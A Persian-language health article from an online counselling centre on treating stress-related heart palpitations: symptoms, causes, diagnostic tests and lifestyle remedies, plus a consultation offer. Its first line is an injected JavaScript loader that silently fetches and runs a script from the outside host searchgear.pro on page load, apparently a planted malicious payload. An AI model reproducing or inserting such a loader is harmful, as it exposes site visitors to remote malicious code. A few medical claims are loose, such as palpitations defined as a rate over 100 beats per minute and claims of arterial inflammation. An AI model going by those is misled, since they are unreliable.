;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); تپش قلب ناشی از استرس را چگونه درمان کنیم|درمان استرس و تپش قلب چیست

تپش قلب ناشی از استرس را چگونه درمان کنیم

میزان پیشرفت خواندن شما

فهرست مطالب

رفع استرس تپش قلب همواره یکی بزرگترین چالش های کسانی است که گاه به گاه دچار دلهره و استرس می شوند. در حقیقت به منظور تشخیص و درمان دلهره و تپش قلب، لازم است سطح استرس خود را به وسیله تست های اختلال اضطراب مورد ارزیابی قرار دهید.

با این حال اگر درگیر تپش قلب همراه با استرس هستید، احتمالا می خواهید بدانید این بیماری چه نشانه هایی دارد؟ چه روش هایی برای تشخیص و درمان دلهره و تپش قلب وجود دارد؟ آیا درمان استرس تپش قلب از طریق راهکارهای خانگی امکان پذیر است؟ بر همین اساس اگر برای رفع استرس تپش قلب خود به دنبال راهکارهای درمانی هستید، در ادامه این مطلب به بررسی علل تپش قلب و روش های درمان استرس قلبی خواهیم پرداخت.

تپش قلب چیست؟

تپش قلب یکی از مهم ترین نشانه های بیماری قلبی است که معمولا با ضربان قلب شدید و بسیار سریع همراه است. به صورت کلی افراد در حالت عادی ضربان قلب خود را احساس نمی کنند و زمانی متوجه آن می شوند که درگیر تپش قلب شده باشند. در حقیقت ضربان قلب شدید معمولا در گلو، قفسه سینه و گردن حس می شود. گاهی اوقات این مشکل ترسناک یا آزاردهنده است، با این حال چندان جدی نبوده و معمولا به سرعت برطرف می شود. به طور معمول تپش قلب در اثر اضطراب، مصرف بیش از حد الکل، نیکوتین و کافئین به وجود می آید. هم چنین احتمال دارد زمانی که فرد باردار است، دچار این عارضه گردد. با این حال به ندرت ممکن است این مشکل نشانه ای از یک بیماری قلبی جدی باشد.

اصلی ترین علائم تپش قلب همراه با استرس چیست؟

برخی از مهم ترین علائم تپش قلب همراه با استرس به شرح زیر است:

ضربان قلب نامنظم

در چنین شرایطی احساس می کنید دچار ضربان قلب شدید شده اید و ریتم ضربان قلب شما از حالت طبیعی خود خارج شده است. هم چنین ممکن است متوجه کند یا تند شدن شدن ضربان قلب خود شوید و یا احساس کنید که قلب شما به مدت 1 الی 2 ثانیه از تپش ایستاده است.

بال زدن

 بسیاری از افراد احساس می کنند که چیزی در قفسه سینه آن ها در حال بال زدن است. به بیان دیگر ممکن است فرد تصور کند که قلب او حرکت می کند.

تپش

 در این شرایط احساس کوبیدن خیلی شدید در قفسه سینه خود خواهید داشت. به گونه ای که ممکن است صدای ضربان قلب خود را به وضوح در گوش تان احساس کنید.

چرا تپش قلب می گیریم؟

به صورت کلی تشخیص منشأ و علت تپش قلب کار ساده ای نیست؛ چرا که اغلب تپش قلب ها منشأ خاصی ندارند. بدیهی است که دلهره و استرس می تواند به تپش قلب منجر شود و احتمالا دلیل اصلی آن توجه زیاد شخص به ضربان قلب خود است که با افزایش آدرنالین همراه خواهد بود و به صورت کاملا تصادفی در افراد مضطرب رخ می دهد. به طور معمول این نوع تپش قلب به حمله پانیک اتک یا هراس منجر خواهد شد. با این حال دلایل مختلفی برای تپش قلب وجود دارند که می توانند نامعلوم و یا مرتبط با قلب باشند.

  • افسردگی
  • سطح غیر طبیعی الکترولیت ها
  • فعالیت های فیزیکی شدید، مصرف نوشیدنی های الکلی یا مواد غیر قانونی مانند آمفتامین و کوکائین، مصرف نیکوتین و کافئین
  • احساسات شدید از قبیل استرس، اضطراب و ترس، این موارد در طول حملات پانیک یا اضطراب اتفاق می افتند.
  • بروز تغییرات هورمونی در طول قاعدگی، بارداری و درست پیش از یائسگی. البته گاهی اوقات ضربان قلب شدید در دوران بارداری نشان دهنده کم خونی است.
  • مصرف برخی مکمل های گیاهی و تغذیه ای، قرص های رژیمی، داروهای استنشاقی آسم، ضد احتقان ها و داروهایی که به منظور درمان کم کاری تیروئید یا جلوگیری از آریتمی ها مورد استفاده قرار می گیرند.
  هیجانات

آیا استرس باعث تپش قلب می شود؟

همان طور که اشاره کردیم، ضربان قلب شدید نشانه ای از یک مشکل قلبی است. در این شرایط حتما با یک پزشک مشورت کنید. گاهی اوقات ممکن است تپش قلب همراه با استرس باشد. در حقیقت استرس و تپش قلب رابطه مستقیم با یکدیگر دارند؛ از یک سو ممکن است استرس ناشی از تپش قلب باشد و از سوی دیگر تپش قلب در افرادی که دچار اضطراب و استرس هستند، شایع تر خواهد بود. در بسیاری موارد نیز مشاهده می شود که تپش قلب بدون هیچ دلیل خاصی به وجود می آید که همین مسئله خودش به استرس منجر می شود. در واقع از آن جایی که تپش قلب موضوع استرس زایی است، بسیاری از مردم فکر می کنند که دچار یک مشکل قلبی جدی شده اند.

در حالت طبیعی ضربان قلب بین 60 الی 100 تپش در هر دقیقه است. تپش قلب زمانی اتفاق می افتد که تعداد ضربان قلب از 100 بار در هر دقیقه بیشتر شود. علت این که هنگام بروز استرس دچار تپش قلب می شویم، بروز واکنش های شیمیایی داخل بدن است. زمانی که به اضطراب شدید دچار می شوید، غده های فوق کلیوی اقدام به آزادسازی هورمون های آدرنالین و کورتیزول می نمایند. این مسائل به ضربان قلب شدید و فشار خون بالا منجر می شوند. در واقع زمانی که تپش قلب اتفاق می افتد، تصور می کنید که قلب در گلو یا قفسه سینه نبض دارد و همین موضوع می تواند با ناراحتی و درد کمی همراه باشد.

به یاد داشته باشید عدم کنترل تپش قلب همراه با استرس، به التهاب در شریان های قلب منجر خواهد شد. در نتیجه اگر همزمان از تپش قلب و تنگی نفس رنج می برید، توصیه می شود به منظور رفع استرس تپش قلب خود حتما نزد پزشک متخصص مراجعه کنید.

تشخیص تپش قلب همراه با استرس از چه روش هایی امکان پذیر است؟

پیش از آن که به درمان و رفع استرس تپش قلب بپردازیم، بهتر است نگاهی به روش های تشخیص این عارضه داشته باشیم. به صورت کلی روش های مختلفی برای تشخیص تپش قلب ناشی از استرس وجود دارد. به منظور تشخیص این عارضه ابتدا پزشک به کمک گوشی صدای قلب شما را ارزیابی می کند و سؤالاتی در خصوص سوابق پزشکی تان مطرح خواهد کرد. گاهی اوقات شرایطی مانند تورم غده تیروئید می تواند به تپش قلب منجر شود. به همین دلیل ابتدا باید علائم این بیماری ها بررسی شود.

اکو قلب

اکو قلب یک نوع آزمایش غیر تهاجمی است که به کمک امواج صوتی، تصویری از قلب ایجاد می نماید. این تصویر متحرک قادر به تشخیص ساختار قلب و جریان خون خواهد بود.

نوار قلب

در طول این آزمایش تکنسین اقدام به چسباندن الکترودهایی بر روی سینه بیمار می کند. این الکترودها قادر به ضبط سیگنال هایی الکتریکی هستند که ضربان قلب را ایجاد می کنند.

مانیتورینگ هولتر

مانیتورینگ هولتر دستگاهی کوچک و قابل حمل است که به منظور ثبت ضربان قلب مورد استفاده قرار می گیرد. در این روش ضربان قلب فرد به مدت 24 الی 72 ساعت مورد ارزیابی قرار می گیرد و تپش قلبی که از طریق معاینات اولیه قابل تشخیص نیست، توسط این روش تشخیص داده می شود.

آیا می دانید تپش قلب ناشی از استرس را چگونه درمان کنیم؟

در پاسخ به این سؤال که درمان استرس و تپش قلب چیست؟ می توان گفت به طور کلی رفع استرس تپش قلب و یا درمان استرس قلب به علل آن بستگی دارد. چنانچه پزشک علت قطعی این عارضه را پیدا نکند، احتمالا شما را به دوری از عوامل ایجاد کننده آن توصیه خواهد کرد. در صورتی که اضطراب و تنش های شما بیش از اندازه باشد، رفع استرس تپش قلب به کمک های درمان های دارویی صورت خواهد گرفت. باید خاطر نشان ساخت در حالت کلی پزشکان به منظور درمان استرس و تپش قلب داروهای خاصی تجویز نمی کنند. مگر در شرایطی که درمان با هدف بهبود افسردگی صورت گیرد. در چنین شرایطی داروهای ضد افسردگی به بیمار تجویز خواهد شد.

  برای درمان بی انگیزگی چکار کنیم؟

لازم است بدانید اگرچه داروهای ضد افسردگی قادر به کنترل اضطراب و استرس هستند، اما اغلب این داروها با عوارضی نظیر کاهش میل جنسی همراه می باشند. با این حال افرادی که درگیر استرس و اضطراب شدید هستند، باید تحت نظر پزشک از داروهای مرتبط با این عارضه استفاده کنند. چنانچه برای رفع استرس تپش قلب خود به دنبال یک متخصص هستید، می‌توانید از طریق مرکز مشاوره روان­یاری اقدام نمایید. در این مرکز امکان مشاوره آنلاین با درمانگران متخصص در زمینه روانشناسی فراهم شده است.

رفع استرس تپش قلب با استفاده از راهکارهای خانگی

بهتر است بدانید بهترین راه رفع استرس تپش قلب، بهره گیری از روش های کنترل شخصی است. در ادامه به برخی از ساده ترین روش های درمان استرس و تپش قلب اشاره خواهیم کرد:

ورزش منظم

ورزش منظم به افزایش ترشح نورآدرنالین سروتونین، دوپامین و گابا آمینو اسید در مغز کمک می کند. هر کدام از این موارد به تنهایی به ایجاد آرامش در فرد منجر خواهند شد.

تغذیه سالم

داشتن رژیم غذایی سالم سرشار از میوه و سبزیجات به تقویت سیستم ایمنی بدن کمک خواهد کرد. بهتر است از مصرف انواع شیرینی و فست فود اجتناب کنید؛ چرا که باعث افزایش استرس و اضطراب خواهند شد.

مدیریت زمان

با تهیه یک برنامه روزانه دقیق به کنترل استرس خود کمک کنید. در این برنامه می توانید زمان مشخصی را برای استراحت، کار کردن و انجام کارهای شخصی خود در نظر بگیرید.

اولویت بندی کارها

اولویت بندی کارها این امکان را برای فرد فراهم می کند که همزمان با افزایش تمرکز، اضطراب کمتری را تجربه کند. به همین خاطر این روش به عنوان یکی از کاربردی ترین راهکارهای رفع استرس تپش قلب شناخته می شود.

کاهش مصرف داروها، الکل و کافئین

بهتر است بدانید مصرف بیش از حد کافئین، الکل و دارو منجر به ضربان قلب شدید و اضطراب می شود. توصیه می شود مصرف دمنوش ها و آبمیوه های طبیعی را در برنامه روزانه خود بگنجانید.

تنفس و حفظ آرامش

انجام یوگا، ماساژ و مدیتیشن به کنترل استرس روزانه کمک زیادی خواهد کرد. با استفاده از راهکارهای آرامش و تنفس، ضربان قلب نرمال شده و در نهایت احساس آرامش بیشتری خواهید داشت.

شایان ذکر است که اگر برای درمان دلهره و تپش قلب خود به دنبال روش های خانگی هستید، بهتر است با اهداف دست یافتنی شروع کنید. برنامه های کمال گرایانه نه تنها استرس شما را کاهش نمی دهند، بلکه می توانند به وخامت اوضاع منجر شوند. به صورت کلی شما می توانید با اقداماتی نظیر ورزش منظم، سبک زندگی سالم، مدیریت زمان، داروهای پیشگیری و … سلامتی خود را تضمین نمایید. درک نشانه ها و علائم تپش قلب همراه با استرس نیز می تواند به عنوان بخش مهمی از پروسه پیگیری سلامت شما باشند. از سوی دیگر مرکز مشاوره آنلاین روان­یاری با ارائه خدمات روانشناسی خود به صورت آنلاین تا پایان طول درمان همراه شما عزیزان خواهد بود.

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.